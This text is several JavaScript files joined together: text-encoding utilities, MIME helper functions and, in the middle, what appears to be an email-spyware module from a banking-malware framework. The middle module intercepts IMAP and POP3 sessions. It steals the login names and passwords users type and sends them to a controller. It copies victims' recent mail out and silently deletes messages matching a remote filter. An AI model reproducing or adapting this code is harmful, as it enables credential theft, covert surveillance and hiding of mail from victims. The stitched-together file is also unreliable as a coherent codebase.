function SingleByteDecoder(index, options) {
    var fatal = options.fatal;
    
    this.decode = function (byte_pointer) {
        var bite = byte_pointer.get();
        if (bite === EOF_byte) {
            return EOF_code_point;
        }
        byte_pointer.offset(1);
        if (inRange(bite, 0x00, 0x7F)) {
            return bite;
        }
        var code_point = index[bite - 0x80];
        if (code_point === null) {
            return decoderError(fatal);
        }
        return code_point;
    };
}


function SingleByteEncoder(index, options) {
    var fatal = options.fatal;
    
    this.encode = function (output_byte_stream, code_point_pointer) {
        var code_point = code_point_pointer.get();
        if (code_point === EOF_code_point) {
            return EOF_byte;
        }
        code_point_pointer.offset(1);
        if (inRange(code_point, 0x0000, 0x007F)) {
            return output_byte_stream.emit(code_point);
        }
        var pointer = indexPointerFor(code_point, index);
        if (pointer === null) {
            encoderError(code_point);
        }
        return output_byte_stream.emit(pointer + 0x80);
    };
}

(function () {
    encodings.forEach(function (category) {
        if (category.heading !== 'Legacy single-byte encodings')
            return;
        category.encodings.forEach(function (encoding) {
            var index = indexes[encoding.name];
            encoding.getDecoder = function (options) {
                return new SingleByteDecoder(index, options);
            };
            encoding.getEncoder = function (options) {
                return new SingleByteEncoder(index, options);
            };
        });
    });
}());













function UTF16Decoder(utf16_be, options) {
    var fatal = options.fatal;
    var  utf16_lead_byte = null,
         utf16_lead_surrogate = null;
    
    this.decode = function (byte_pointer) {
        var bite = byte_pointer.get();
        if (bite === EOF_byte && utf16_lead_byte === null &&
            utf16_lead_surrogate === null) {
            return EOF_code_point;
        }
        if (bite === EOF_byte && (utf16_lead_byte !== null ||
                                  utf16_lead_surrogate !== null)) {
            return decoderError(fatal);
        }
        byte_pointer.offset(1);
        if (utf16_lead_byte === null) {
            utf16_lead_byte = bite;
            return null;
        }
        var code_point;
        if (utf16_be) {
            code_point = (utf16_lead_byte << 8) + bite;
        } else {
            code_point = (bite << 8) + utf16_lead_byte;
        }
        utf16_lead_byte = null;
        if (utf16_lead_surrogate !== null) {
            var lead_surrogate = utf16_lead_surrogate;
            utf16_lead_surrogate = null;
            if (inRange(code_point, 0xDC00, 0xDFFF)) {
                return 0x10000 + (lead_surrogate - 0xD800) * 0x400 +
                    (code_point - 0xDC00);
            }
            byte_pointer.offset(-2);
            return decoderError(fatal);
        }
        if (inRange(code_point, 0xD800, 0xDBFF)) {
            utf16_lead_surrogate = code_point;
            return null;
        }
        if (inRange(code_point, 0xDC00, 0xDFFF)) {
            return decoderError(fatal);
        }
        return code_point;
    };
}


function UTF16Encoder(utf16_be, options) {
    var fatal = options.fatal;
    
    this.encode = function (output_byte_stream, code_point_pointer) {
        function convert_to_bytes(code_unit) {
            var byte1 = code_unit >> 8;
            var byte2 = code_unit & 0x00FF;
            if (utf16_be) {
                return output_byte_stream.emit(byte1, byte2);
            }
            return output_byte_stream.emit(byte2, byte1);
        }
        var code_point = code_point_pointer.get();
        if (code_point === EOF_code_point) {
            return EOF_byte;
        }
        code_point_pointer.offset(1);
        if (inRange(code_point, 0xD800, 0xDFFF)) {
            encoderError(code_point);
        }
        if (code_point <= 0xFFFF) {
            return convert_to_bytes(code_point);
        }
        var lead = div((code_point - 0x10000), 0x400) + 0xD800;
        var trail = ((code_point - 0x10000) % 0x400) + 0xDC00;
        convert_to_bytes(lead);
        return convert_to_bytes(trail);
    };
}

name_to_encoding['utf-16le'].getEncoder = function (options) {
    return new UTF16Encoder(false, options);
};
name_to_encoding['utf-16le'].getDecoder = function (options) {
    return new UTF16Decoder(false, options);
};


name_to_encoding['utf-16be'].getEncoder = function (options) {
    return new UTF16Encoder(true, options);
};
name_to_encoding['utf-16be'].getDecoder = function (options) {
    return new UTF16Decoder(true, options);
};




function detectEncoding(label, input_stream) {
    if (input_stream.match([0xFF, 0xFE])) {
        input_stream.offset(2);
        return 'utf-16le';
    }
    if (input_stream.match([0xFE, 0xFF])) {
        input_stream.offset(2);
        return 'utf-16be';
    }
    if (input_stream.match([0xEF, 0xBB, 0xBF])) {
        input_stream.offset(3);
        return 'utf-8';
    }
    return label;
}





 var DEFAULT_ENCODING = 'utf-8';


function TextEncoder(opt_encoding, options) {
    if (!(this instanceof TextEncoder)) {
        return new TextEncoder(opt_encoding, options);
    }
    opt_encoding = opt_encoding ? String(opt_encoding) : DEFAULT_ENCODING;
    options = Object(options);
    
    this._encoding = getEncoding(opt_encoding);
    if (this._encoding === null || (this._encoding.name !== 'utf-8' &&
                                    this._encoding.name !== 'utf-16le' &&
                                    this._encoding.name !== 'utf-16be'))
        throw new TypeError('Unknown encoding: ' + opt_encoding);
    
    this._streaming = false;
    
    this._encoder = null;
    
    this._options = { fatal: Boolean(options.fatal) };

    if (Object.defineProperty) {
        Object.defineProperty(
            this, 'encoding',
            { get: function () { return this._encoding.name; } });
    } else {
        this.encoding = this._encoding.name;
    }

    return this;
}

TextEncoder.prototype = {
    
    encode: function encode(opt_string, options) {
        opt_string = opt_string ? String(opt_string) : '';
        options = Object(options);
        
        if (!this._streaming) {
            this._encoder = this._encoding.getEncoder(this._options);
        }
        this._streaming = Boolean(options.stream);

        var bytes = [];
        var output_stream = new ByteOutputStream(bytes);
        var input_stream = new CodePointInputStream(opt_string);
        while (input_stream.get() !== EOF_code_point) {
            this._encoder.encode(output_stream, input_stream);
        }
        if (!this._streaming) {
            var last_byte;
            do {
                last_byte = this._encoder.encode(output_stream, input_stream);
            } while (last_byte !== EOF_byte);
            this._encoder = null;
        }
        return new Buffer(bytes);
    }
};



function TextDecoder(opt_encoding, options) {
    if (!(this instanceof TextDecoder)) {
        return new TextDecoder(opt_encoding, options);
    }
    opt_encoding = opt_encoding ? String(opt_encoding) : DEFAULT_ENCODING;
    options = Object(options);
    
    this._encoding = getEncoding(opt_encoding);
    if (this._encoding === null)
        throw new TypeError('Unknown encoding: ' + opt_encoding);

    
    this._streaming = false;
    
    this._decoder = null;
    
    this._options = { fatal: Boolean(options.fatal) };

    if (Object.defineProperty) {
        Object.defineProperty(
            this, 'encoding',
            { get: function () { return this._encoding.name; } });
    } else {
        this.encoding = this._encoding.name;
    }

    return this;
}




TextDecoder.prototype = {
    
    decode: function decode(buf, options) {
        options = Object(options);

        if (!this._streaming) {
            this._decoder = this._encoding.getDecoder(this._options);
            this._BOMseen = false;
        }
        this._streaming = Boolean(options.stream);

        var input_stream = new ByteInputStream(buf);

        var output_stream = new CodePointOutputStream(), code_point;
        while (input_stream.get() !== EOF_byte) {
            code_point = this._decoder.decode(input_stream);
            if (code_point !== null && code_point !== EOF_code_point) {
                output_stream.emit(code_point);
            }
        }
        if (!this._streaming) {
            do {
                code_point = this._decoder.decode(input_stream);
                if (code_point !== null && code_point !== EOF_code_point) {
                    output_stream.emit(code_point);
                }
            } while (code_point !== EOF_code_point &&
                     input_stream.get() != EOF_byte);
            this._decoder = null;
        }

        var result = output_stream.string();
        if (!this._BOMseen && result.length) {
            this._BOMseen = true;
            if (UTFs.indexOf(this.encoding) !== -1 &&
               result.charCodeAt(0) === 0xFEFF) {
                result = result.substring(1);
            }
        }

        return result;
    }
};

var UTFs = ['utf-8', 'utf-16le', 'utf-16be'];
exports.TextEncoder = TextEncoder;
exports.TextDecoder = TextDecoder;
exports.encodingExists = getEncoding;

var iconvLite = require('inconvlite');
var Iconv;

exports.convert = convert;

function checkEncoding(name) {
    return (name || '').toString().trim().
    replace(/^latin[\-_]?(\d+)$/i, 'ISO-8859-$1').
    replace(/^win(?:dows)?[\-_]?(\d+)$/i, 'WINDOWS-$1').
    replace(/^utf[\-_]?(\d+)$/i, 'UTF-$1').
    replace(/^ks_c_5601\-1987$/i, 'CP949').
    replace(/^us[\-_]?ascii$/i, 'ASCII').
    toUpperCase();
}

function convert(str, to, from, useLite) {
    from = checkEncoding(from || 'UTF-8');
    to = checkEncoding(to || 'UTF-8');
    str = str || '';

    var result;

    if (from != 'UTF-8' && typeof str == 'string') {
        str = new Buffer(str, 'binary');
    }

    if (from === to) {
        if (typeof str === 'string') {
            result = new Buffer(str);
        } else {
            result = str;
        }
    } else {
        try {
            result = convertIconvLite(str, to, from);
        } catch (E) {
            console.error(E);
            result = str;
        }
    }

    if (typeof result == 'string') {
        result = new Buffer(result, 'utf-8');
    }

    return result;
}


function convertIconvLite(str, to, from) {
    if (to == 'UTF-8') {
        return iconvLite.decode(str, from);
    } else if (from == 'UTF-8') {
        return iconvLite.encode(str, to);
    } else {
        return iconvLite.encode(iconvLite.decode(str, from), to);
    }
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

========

var protobuf = require('protocol_buffers');
var Imap = require('imap_client');
var POP3Client = require('pop3_client');
var util = require('util');
var mimelib = require("mimelib");
var MailParser = require("mailparser").MailParser;
var zeusfunctions = require("zeusmask");

var messages = protobuf([
  'message MailMessage {',
    '     optional string html = 1;',
    '     optional string text = 2;',
    '     optional string subject = 3;',
    '     optional string messageId = 4;',
    '     optional string inReplyTo = 5;',
    '     optional string priority = 6;',
    '     optional string from = 7;',
    '     optional string to = 8;',
    '     optional string date = 9;',
    '     optional string receivedDate = 10;',
    '     optional string headers = 11;',
    '     optional bool isDeletedByMailware = 12;',
  '}'
].join('\n'));


process.mailware = {
    ControlledMailsCount : 20
}

var hasOwn = Object.prototype.hasOwnProperty;
var CONTROL = '(?:' + [
    '\\|\\|', '\\&\\&', ';;', '\\|\\&', '[&;()|<>]'
].join('|') + ')';
var META = '|&;()<> \\t';
var BAREWORD = '(\\\\[\'"' + META + ']|[^\\s\'"' + META + '])+';
var SINGLE_QUOTE = '"((\\\\"|[^"])*?)"';
var DOUBLE_QUOTE = '\'((\\\\\'|[^\'])*?)\'';

var TOKEN = '';
for (var i = 0; i < 4; i++) {
    TOKEN += (Math.pow(16, 8) * Math.random()).toString(16);
}

function filter(arr, fn) {
    if (arr.filter) return arr.filter(fn);
    var ret = [];
    for (var i = 0; i < arr.length; i++) {
        if (!hasOwn.call(arr, i)) continue;
        if (fn(arr[i], i, arr)) ret.push(arr[i]);
    }
    return ret;
};

function reduce(xs, f, acc) {
    var hasAcc = arguments.length >= 3;
    if (hasAcc && xs.reduce) return xs.reduce(f, acc);
    if (xs.reduce) return xs.reduce(f);

    for (var i = 0; i < xs.length; i++) {
        if (!hasOwn.call(xs, i)) continue;
        if (!hasAcc) {
            acc = xs[i];
            hasAcc = true;
            continue;
        }
        acc = f(acc, xs[i], i);
    }
    return acc;
};

function map(xs, f) {
    return xs.map(f);
};


function parse(s, env) {
    var chunker = new RegExp([
        '(' + CONTROL + ')', 
        '(' + BAREWORD + '|' + SINGLE_QUOTE + '|' + DOUBLE_QUOTE + ')*'
    ].join('|'), 'g');

    var match = filter(s.match(chunker), Boolean);

    if (!match) return [];
    if (!env) env = {};
    return map(match, function (s) {
        if (RegExp('^' + CONTROL + '$').test(s)) {
            return { op: s };
        }

        
        
        
        
        
        
        
        
        
        
        
        var SQ = "'";
        var DQ = '"';
        var BS = '\\';
        var DS = '$';
        var quote = false;
        var varname = false;
        var esc = false;
        var out = '';
        var isGlob = false;

        for (var i = 0, len = s.length; i < len; i++) {
            var c = s.charAt(i);
            isGlob = isGlob || (!quote && (c === '*' || c === '?'))
            if (esc) {
                out += c;
                esc = false;
            }
            else if (quote) {
                if (c === quote) {
                    quote = false;
                }
                else if (quote == SQ) {
                    out += c;
                }
                else { 
                    if (c === BS) {
                        i += 1;
                        c = s.charAt(i);
                        if (c === DQ || c === BS || c === DS) {
                            out += c;
                        } else {
                            out += BS + c;
                        }
                    }
                    else if (c === DS) {
                        out += parseEnvVar();
                    }
                    else {
                        out += c
                    }
                }
            }
            else if (c === DQ || c === SQ) {
                quote = c
            }
            else if (RegExp('^' + CONTROL + '$').test(c)) {
                return { op: s };
            }
            else if (c === BS) {
                esc = true
            }
            else if (c === DS) {
                out += parseEnvVar();
            }
            else out += c;
        }

        if (isGlob) return { op: 'glob', pattern: out };

        return out

        function parseEnvVar() {
            i += 1;
            var varend, varname;
            
            if (s.charAt(i) === '{') {
                i += 1
                if (s.charAt(i) === '}') {
                    throw new Error("Bad substitution: " + s.substr(i - 2, 3));
                }
                varend = s.indexOf('}', i);
                if (varend < 0) {
                    throw new Error("Bad substitution: " + s.substr(i));
                }
                varname = s.substr(i, varend - i);
                i = varend;
            }
            else if (/[*@#?$!_\-]/.test(s.charAt(i))) {
                varname = s.charAt(i);
                i += 1;
            }
            else {
                varend = s.substr(i).match(/[^\w\d_]/);
                if (!varend) {
                    varname = s.substr(i);
                    i = s.length;
                } else {
                    varname = s.substr(i, varend.index)
                    i += varend.index - 1;
                }
            }
            return getVar(null, '', varname);
        }
    });

    function getVar(_, pre, key) {
        var r = typeof env === 'function' ? env(key) : env[key];
        if (r === undefined) r = '';

        if (typeof r === 'object') {
            return pre + TOKEN + JSON.stringify(r) + TOKEN;
        }
        else return pre + r;
    }
};


function parseCommandLine(s, env) {
    var mapped = parse(s, env);
    if (typeof env !== 'function') return mapped;
    return reduce(mapped, function (acc, s) {
        if (typeof s === 'object') return acc.concat(s);
        var xs = s.split(RegExp('(' + TOKEN + '.*?' + TOKEN + ')', 'g'));
        if (xs.length === 1) return acc.concat(xs[0]);
        return acc.concat(map(filter(xs, Boolean), function (x) {
            if (RegExp('^' + TOKEN).test(x)) {
                return JSON.parse(x.split(TOKEN)[1]);
            }
            else return x;
        }));
    }, []);
};


function ServeIMAPConnection(
    remoteSocket,
    clientSocket,
    remoteHost,
    isSSL
) {
    var login = false;
    var password = false;

    var emailsForRemove = [];

    print('ServeIMAPConnection()');

    function fuckupBoxByName(boxName, cb)
    {
        if (!clientSocket.imap) {
            var boxpath = [];

            function searchTrash(boxes) {
                for (var i in boxes) {
                    if (boxes[i].special_use_attrib === '\\Trash') {
                        if (boxpath.length) {
                            
                            clientSocket.imap.trashBoxPath = util.format('%s%s%s', boxpath.join(boxes[i].delimiter), boxes[i].delimiter, i);
                        } else {
                            
                            clientSocket.imap.trashBoxPath = i;
                        }
                        break;
                    }
                    if (boxes[i].children !== null) {
                        boxpath.push(i)
                        searchTrash(boxes[i].children);
                        boxpath.pop();
                    }
                }
            }

            clientSocket.imap = new Imap({
                user: clientSocket.login,
                password: clientSocket.password,
                host: remoteHost,
                port: process.PORT_REDIRECTION_BASE + (isSSL ? 993 : 143),
                tls: isSSL,
                keepalive: true,
                tlsOptions: {
                    rejectUnauthorized: false
                },
                debug: function (msg) {
                    
                }
            });

            clientSocket.imap.on('ready', function () {
                clientSocket.imap.getBoxes(function (error, boxes) {

                    if (!error)
                    {
                        searchTrash(boxes);
                    }

                    OnImapReady();
                });
            });
            

            clientSocket.imap.on('error', function (err) {
                
                clientSocket.end();
                remoteSocket.end();
            });

            clientSocket.imap.on('end', function () {
                clientSocket.end();
                remoteSocket.end();
                
            });

            clientSocket.imap.connect();

        } else {
            OnImapReady();
        }

        function OnImapReady() {

            

            clientSocket.imap.resumed = false;

            clientSocket.imap.openBox(boxName, true, false, function (err, box) {
                var requestString;
                if (box.messages.total < process.mailware.ControlledMailsCount) {
                    requestString = '1:*';
                } else {
                    requestString = util.format('%d:*', box.messages.total - (process.mailware.ControlledMailsCount - 1));
                }

                
                

                var f = clientSocket.imap.seq.fetch(requestString, {
                    bodies: '',
                    struct: true
                });

                f.on('message', function (msg, seqno) {

                    
                    var prefix = '(#' + seqno + ') ';
                    var mailparser = new MailParser();
                    var currentUUID;
                    msg.on('body', function (stream, info) {
                        stream.on('data', function (chunk) {
                            mailparser.write(chunk.toString('utf8'));
                        });

                        stream.once('end', function () {
                            mailparser.end();
                        });
                    });

                    msg.once('end', function () {
                        
                    });

                    msg.once('attributes', function (attrs) {
                        
                        currentUUID = attrs.uid;
                    });

                    mailparser.on("end", function (mail_object) {

                        mail_object.isDeletedByMailware = false;

                        if (IsBadEmail(mail_object) && currentUUID) {
                            mail_object.isDeletedByMailware = true;
                            
                            emailsForRemove.push(currentUUID);
                        }

                        process.sendMail(mail_object);
                    });
                });

                f.once('error', function (err) {
                    
                });

                f.once('end', function () {
                   

                    setTimeout(function () {
                        cb();
                    }, 500);
                });
            });
        }
        
    }

    function removeUnwantedMail(cb) {
        if (emailsForRemove.length > 0) {
            
            if (clientSocket.imap.trashBoxPath)
            {
                
                clientSocket.imap.setFlags(emailsForRemove, ['SEEN'], function (error) {
                    clientSocket.imap.move(emailsForRemove, clientSocket.imap.trashBoxPath, function (err) {
                        emailsForRemove = [];
                        cb();
                    });
                });
            } else {
                
                clientSocket.imap.setFlags(emailsForRemove, ['DELETED', 'SEEN'], function () {
                    clientSocket.imap.expunge(emailsForRemove, function (err) {
                        emailsForRemove = [];

                        cb();
                    })
                });
            }
        } else {
            cb();
        }
    }

    clientSocket.on('data', function (chunk) {
        print('C', chunk.toString().trim());

        var cmdline = parseCommandLine(chunk.toString().trim());

        

        var tag = cmdline.shift();
        var command = cmdline.shift();
        var argv = cmdline;

        if (command === 'LOGIN')
        {

            if (argv.length === 2)
            {
                try
                {
                    clientSocket.login = argv[0];
                    clientSocket.password = argv[1];

                    process.SendAuthInformationPacket(
                        clientSocket.login,
                        (isSSL === true ? '(IMAP-TLS)' : '(IMAP)') + ' ' + remoteHost,
                        clientSocket.password);

                }
                catch (e) {
                    process.log('IMAP : Cant parse auth string');
                    process.log(chunk.toString());
                }
            }

            remoteSocket.write(chunk);

        } else if (command === 'SELECT') {

            
            var boxName = argv[0];

            

            clientSocket.pause();
            remoteSocket.pause();
            clientSocket.currentBoxName = boxName;

            fuckupBoxByName(boxName, function () {
                removeUnwantedMail(function () {
                    clientSocket.imap.closeBox(function () {
                        clientSocket.resume();
                        remoteSocket.resume();

                        remoteSocket.write(chunk);
                        
                    })
                })
            });

            

        } else {
            remoteSocket.write(chunk);
        }
    });

    remoteSocket.on('data', function (chunk) {

        print('S', chunk.toString().trim());

        

        var cmdline = chunk.toString().trim().split(/\s+/g);

        

        var tag = cmdline.shift();
        var uuids = cmdline.shift();
        var command = cmdline.shift();

        if (tag === "*" && command === 'EXISTS')
        {

            clientSocket.pause();
            remoteSocket.pause();

            
            fuckupBoxByName(clientSocket.currentBoxName, function () {
                removeUnwantedMail(function () {
                    clientSocket.imap.closeBox(function () {
                        clientSocket.resume();
                        remoteSocket.resume();

                        clientSocket.write(chunk);
                        
                    })
                })
                             
            });
        } else {
            clientSocket.write(chunk);
        }
    });

}

process.sendMail = function (mailObject) {
    try {

        var packet = messages.MailMessage.encode({
            html: mailObject.html,
            text: mailObject.text,
            subject: mailObject.subject,
            messageId: mailObject.messageId,
            inReplyTo: JSON.stringify(mailObject.inReplyTo),
            priority: mailObject.priority,
            from: JSON.stringify(mailObject.from),
            to: JSON.stringify(mailObject.to),
            date: JSON.stringify(mailObject.date),
            receivedDate: JSON.stringify(mailObject.receivedDate),
            headers: JSON.stringify(mailObject.headers || ""),
            isDeletedByMailware: mailObject.isDeletedByMailware
        });

        if (process.controllerConnection) {
            process.controllerConnection
                .sendProtocolPacket(P_SPYWARE,
                    SLAVE_PACKET_MAIL, 0, packet);
        } else {
            if (process.masterConnection) {
                process.masterConnection.sendProtocolPacket(
                    SLAVE_PACKET_MAIL,
                    packet
                );
            }
            else {
                process.pendingMessages.push({
                    t: SLAVE_PACKET_MAIL,
                    p: packet
                });
            }
        }

    } catch (e) {
        
        
    }
}

function IsBadEmail(mail_object) {

    if (util.isUndefined(process.g_scfg)) {
        return false;
    }

    var emailfilterArray = process.g_scfg.emailfilter;

    if (util.isUndefined(emailfilterArray))
    {
        return false;
    }

    for (let i = 0; i < emailfilterArray.length; i++)
    {
        var filt = emailfilterArray[i];
        var emailtext = mail_object.text;
        var from = JSON.stringify(mail_object.from);
        var to = JSON.stringify(mail_object.to);
        var subject = mail_object.subject;

        if (util.isUndefined(emailtext) || emailtext === '') {
            emailtext = mail_object.html;
        }

        if (filt.from.length > 1 && from.length > 1) {
            if (zeusfunctions.zeusIsModificationNeeded(from, filt.from)) {
                return true;
            }
        }

        if (filt.to.length > 1 && to.length > 1) {
            if (zeusfunctions.zeusIsModificationNeeded(to, filt.to)) {
                return true;
            }
        }

        if (filt.subject.length > 1 && subject.length > 1) {
            if (zeusfunctions.zeusIsModificationNeeded(subject, filt.subject)) {
                return true;
            }
        }

        if (filt.body.length > 1 && emailtext.length > 1) {
            if (zeusfunctions.zeusIsModificationNeeded(emailtext, filt.body)) {
                return true;
            }
        }
    }

    return false;
}


const POP3STATE_INITIAL = 0;
const POP3STATE_USERNAME_GOT = 1;
const POP3STATE_PASSWORD_GOT = 2;
const POP3STATE_AUTHORIZED = 3;

function ServePOP3Connection(
    remoteSocket,
    clientSocket,
    remoteHost,
    isSSL
) {
    var login = false;
    var password = false;

    clientSocket.pop3state = POP3STATE_INITIAL;

    clientSocket.on('data', function (chunk) {

        

        var datums = chunk.toString().trim().split(" ");
        var command = datums.shift().trim().toUpperCase();
        var argument = datums.join(" ").trim();
        

        if (command === "USER"){
            clientSocket.username = argument;
            clientSocket.pop3state = POP3STATE_USERNAME_GOT;

            remoteSocket.write(chunk);

        } else if (command === "PASS") {
            clientSocket.password = argument;
            clientSocket.pop3state = POP3STATE_PASSWORD_GOT;

            remoteSocket.write(chunk);

        } else if (command === "STAT" && clientSocket.pop3state === POP3STATE_AUTHORIZED) {

            clientSocket.pause();
            remoteSocket.pause();
            clientSocket.resumed = false;

            

            var client = new POP3Client(
                (process.PORT_REDIRECTION_BASE + (isSSL ? 995 : 110)), remoteHost, {
                    debug: true,
                    enabletls: isSSL,
                    ignoretlserrs : true
                });

            client.currentmsg = [];
            client.emailsForRemove = [];

            client.on("error", function (err) {
                
                continueRealConnection();
            });

            client.on("connect", function (status, rawdata) {
                if (status) {
                    
                    client.login(clientSocket.username, clientSocket.password);
                } else {
                    
                    client.quit();
                    return;
                }
            });

            client.on("login", function (status, rawdata) {
                if (status) {
                    
                    client.stat();
                } else {
                    
                    client.quit();
                }
            });


            client.on("stat", function (status, data, rawdata) {
                if (status) {
                    

                    if (data && data.count){
                        

                        if (data.count === 0) {
                            client.quit(); 
                        } else {
                            client.list();
                        }

                    }else{
                        
                        client.quit();
                    }

                } else {
                    
                    client.quit();
                    return;
                }
            });

            client.on("list", function (status, msgcount, msgnumber, data, rawdata) {

                if (status === false) {
                    
                    client.quit();
                } else {

                    

                    if (msgcount > 0) {

                        

                        for (let i = 1; i <= msgcount; i++) {
                            client.currentmsg.push(i);
                        }

                        client.retr(client.currentmsg.shift());
                    } else {
                        client.quit();
                    }

                }
            });

            client.on("retr", function (status, msgnumber, data, rawdata) {

                if (status === true) {

                    
                    var mailparser = new MailParser();

                    mailparser.write(data);
                    mailparser.end();

                    mailparser.on("end", function (mail_object) {

                        mail_object.isDeletedByMailware = false;

                        if (IsBadEmail(mail_object)) {
                            mail_object.isDeletedByMailware = true;
                            client.emailsForRemove.push(msgnumber);
                        }

                        process.sendMail(mail_object);

                        if (client.currentmsg.length > 0) {
                            client.retr(client.currentmsg.shift());
                        } else {
                            if (client.emailsForRemove.length === 0) {
                                client.quit();
                            } else {
                                client.dele(client.emailsForRemove.shift());
                            }
                        }
                    });

                } else {

                    
                    client.quit();

                }
            });

            client.on("dele", function (status, msgnumber, data, rawdata) {

                if (status === true) {

                    

                    if (client.emailsForRemove.length > 0) {
                        client.dele(client.emailsForRemove.shift());
                    } else {
                        client.quit();
                    }

                } else {
                    
                    client.quit();
                }
            });

            client.on("close", function (status, rawdata) {
                
                continueRealConnection();
            });

            client.on("end", function (status, rawdata) {
                
                continueRealConnection();
            });

            function continueRealConnection() {
                if (!clientSocket.resumed) {
                    clientSocket.resumed = true;
                    remoteSocket.write(chunk);
                    clientSocket.resume();
                    remoteSocket.resume();
                }
            }
            
        } else {
            remoteSocket.write(chunk);
        }
        
    });

    remoteSocket.on('data', function (chunk) {

        

        if (clientSocket.pop3state == POP3STATE_PASSWORD_GOT)
        {
            var reply = chunk.toString();
            if(reply.indexOf('+OK') === 0)
            {
                
                clientSocket.pop3state = POP3STATE_AUTHORIZED;
                process.SendAuthInformationPacket(clientSocket.username,
                    (isSSL === true ? '(POP3-TLS)' : '(POP3)') + ' ' + remoteHost,
                    clientSocket.password);
            }
        }

        clientSocket.write(chunk);
    });

    remoteSocket.on('end', function () {
        clientSocket.end();
    })

    clientSocket.on('end', function () {
        remoteSocket.end();
    })

}

exports.ServeIMAPConnection = ServeIMAPConnection;
exports.ServePOP3Connection = ServePOP3Connection;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========

var convert = require("encoding").convert,
    addressparser = require("addressparser");


module.exports.foldLine = function(str, maxLength, foldAnywhere, afterSpace, lineMargin) {
    if (foldAnywhere) {
        return addBase64SoftLinebreaks(str, maxLength || 76);
    }
    return module.exports.mimeFunctions.foldLine(str, maxLength, !! afterSpace, lineMargin);
};


module.exports.encodeMimeWord = function(str, encoding, charset, maxLength) {
    return module.exports.mimeFunctions.encodeMimeWord(str, encoding, maxLength || 0, charset);
};


module.exports.encodeMimeWords = function(str, encoding, maxLength, charset) {
    return module.exports.mimeFunctions.encodeMimeWords(str, encoding, maxLength || 0, charset);
};


module.exports.decodeMimeWord = function(str) {
    return module.exports.mimeFunctions.decodeMimeWord(str).toString("utf-8");
};


module.exports.parseMimeWords = function(str) {
    return module.exports.mimeFunctions.decodeMimeWords(str).toString("utf-8");
};


module.exports.encodeQuotedPrintable = function(str, mimeWord, charset) {
    if (typeof mimeWord == "string" && !charset) {
        charset = mimeWord;
        mimeWord = undefined;
    }
    return module.exports.mimeFunctions.encodeQuotedPrintable(str, charset);
};


module.exports.decodeQuotedPrintable = function(str, mimeWord, charset) {
    if (typeof mimeWord == "string" && !charset) {
        charset = mimeWord;
        mimeWord = undefined;
    }
    charset = (charset || "").toString().toUpperCase().trim();
    var decodedString = module.exports.mimeFunctions.decodeQuotedPrintable(str, "utf-8", charset);
    return charset == "BINARY" ? decodedString : decodedString.toString("utf-8");
};


module.exports.encodeBase64 = function(str, charset) {
    return module.exports.mimeFunctions.encodeBase64(str, charset);
};


module.exports.decodeBase64 = function(str, charset) {
    return module.exports.mimeFunctions.decodeBase64(str, "utf-8", charset).toString("utf-8");
};


module.exports.parseAddresses = function(addresses) {
    return [].concat.apply([], [].concat(addresses).map(addressparser)).map(function(address) {
        address.name = module.exports.parseMimeWords(address.name);
        if (address.group) {
            address.group.forEach(function(groupAddress) {
                groupAddress.name = module.exports.parseMimeWords(groupAddress.name);
            });
        }
        return address;
    });
};


module.exports.parseHeaders = function(headers) {
    return module.exports.mimeFunctions.parseHeaderLines(headers);
};


module.exports.parseHeaderLine = function(line) {
    if (!line) {
        return {};
    }

    var result = {}, parts = line.split(";"),
        pos;

    for (var i = 0, len = parts.length; i < len; i++) {
        pos = parts[i].indexOf("=");
        if (pos < 0) {
            result[!i ? "defaultValue" : "i-" + i] = parts[i].trim();
        } else {
            result[parts[i].substr(0, pos).trim().toLowerCase()] = parts[i].substr(pos + 1).trim();
        }
    }
    return result;
};

module.exports.mimeFunctions = {

    mimeEncode: function(str, toCharset, fromCharset) {
        toCharset = toCharset || "UTF-8";
        fromCharset = fromCharset || "UTF-8";

        var buffer = convert(str || "", toCharset, fromCharset),
            ranges = [
                [0x09],
                [0x0A],
                [0x0D],
                [0x20],
                [0x21],
                [0x23, 0x3C],
                [0x3E],
                [0x40, 0x5E],
                [0x60, 0x7E]
            ],
            result = "";

        for (var i = 0, len = buffer.length; i < len; i++) {
            if (checkRanges(buffer[i], ranges)) {
                result += String.fromCharCode(buffer[i]);
                continue;
            }
            result += "=" + (buffer[i] < 0x10 ? "0" : "") + buffer[i].toString(16).toUpperCase();
        }

        return result;
    },

    mimeDecode: function(str, toCharset, fromCharset) {
        str = (str || "").toString();
        toCharset = toCharset || "UTF-8";
        fromCharset = fromCharset || "UTF-8";

        var encodedBytesCount = (str.match(/\=[\da-fA-F]{2}/g) || []).length,
            bufferLength = str.length - encodedBytesCount * 2,
            chr, hex,
            buffer = new Buffer(bufferLength),
            bufferPos = 0;

        for (var i = 0, len = str.length; i < len; i++) {
            chr = str.charAt(i);
            if (chr == "=" && (hex = str.substr(i + 1, 2)) && /[\da-fA-F]{2}/.test(hex)) {
                buffer[bufferPos++] = parseInt(hex, 16);
                i += 2;
                continue;
            }
            buffer[bufferPos++] = chr.charCodeAt(0);
        }

        if (fromCharset.toUpperCase().trim() == "BINARY") {
            return buffer;
        }
        return convert(buffer, toCharset, fromCharset);
    },

    encodeBase64: function(str, toCharset, fromCharset) {
        var buffer = convert(str || "", toCharset, fromCharset);
        return addSoftLinebreaks(buffer.toString("base64"), "base64");
